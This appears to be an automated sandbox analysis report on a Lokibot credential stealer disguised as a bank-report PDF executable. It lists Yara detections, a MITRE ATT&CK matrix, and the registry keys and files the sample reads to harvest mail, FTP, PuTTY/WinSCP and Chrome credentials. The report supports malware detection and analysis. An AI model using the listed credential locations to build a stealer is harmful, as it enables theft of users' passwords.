Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation

Source: C:\Users\user\Desktop\Informe bancario.pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: C:\Users\user\Desktop\Informe bancario.pdf.exe

Code function: 5_2_00406069 GetUserNameW,

Stealing of Sensitive Information

Yara detected Lokibot

Source: Yara match	File source: 0.2.Informe bancario.pdf.exe.39c40c0.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.Informe bancario.pdf.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Informe bancario.pdf.exe.29dc220.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.Informe bancario.pdf.exe.400000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.Informe bancario.pdf.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.Informe bancario.pdf.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.Informe bancario.pdf.exe.400000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Informe bancario.pdf.exe.39f9f00.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.Informe bancario.pdf.exe.400000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.Informe bancario.pdf.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Informe bancario.pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.Informe bancario.pdf.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Informe bancario.pdf.exe.29d4fd4.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.Informe bancario.pdf.exe.400000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Informe bancario.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.Informe bancario.pdf.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Informe bancario.pdf.exe.39dfee0.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Informe bancario.pdf.exe.2860464.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000000.289365771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.293340629.00000000039C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.289020067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.523674646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.288685837.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.288344721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.292486343.0000000002858000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.293368296.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Informe bancario.pdf.exe PID: 6496, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Informe bancario.pdf.exe PID: 6824, type: MEMORYSTR

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts

Tries to steal Mail credentials (via file registry)

Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Code function: PopPassword
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Code function: SmtpPassword

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Informe bancario.pdf.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Source: Yara match	File source: 0.2.Informe bancario.pdf.exe.39c40c0.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.Informe bancario.pdf.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Informe bancario.pdf.exe.29dc220.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.Informe bancario.pdf.exe.400000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.Informe bancario.pdf.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.Informe bancario.pdf.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.Informe bancario.pdf.exe.400000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Informe bancario.pdf.exe.39f9f00.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.Informe bancario.pdf.exe.400000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.Informe bancario.pdf.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Informe bancario.pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.Informe bancario.pdf.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Informe bancario.pdf.exe.29d4fd4.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.Informe bancario.pdf.exe.400000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Informe bancario.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.Informe bancario.pdf.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Informe bancario.pdf.exe.39dfee0.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Informe bancario.pdf.exe.2860464.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000000.289365771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.293340629.00000000039C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.289020067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.523674646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.288685837.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.288344721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.292486343.0000000002858000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.293368296.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	1 Access Token Manipulation	1 Disable or Modify Tools	2 OS Credential Dumping	1 Account Discovery	Remote Services	11 Archive Collected Data	Exfiltration Over Other Network Medium	3 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	11 Process Injection	11 Deobfuscate/Decode Files or Information	1 Input Capture	1 File and Directory Discovery	Remote Desktop Protocol	2 Data from Local System	Exfiltration Over Bluetooth	1 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	13 Obfuscated Files or Information	2 Credentials in Registry	13 System Information Discovery	SMB/Windows Admin Shares	1 Email Collection	Automated Exfiltration	3 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	12 Software Packing	NTDS	111 Security Software Discovery	Distributed Component Object Model	1 Input Capture	Scheduled Transfer	113 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	11 Masquerading	LSA Secrets	1 Process Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	21 Virtualization/Sandbox Evasion	Cached Domain Credentials	21 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 Access Token Manipulation	DCSync	1 System Owner/User Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	11 Process Injection	Proc Filesystem	1 Remote System Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Informe bancario.pdf.exe	30%	Virustotal		Browse
Informe bancario.pdf.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
5.0.Informe bancario.pdf.exe.400000.12.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
5.0.Informe bancario.pdf.exe.400000.8.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.2.Informe bancario.pdf.exe.39f9f00.10.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
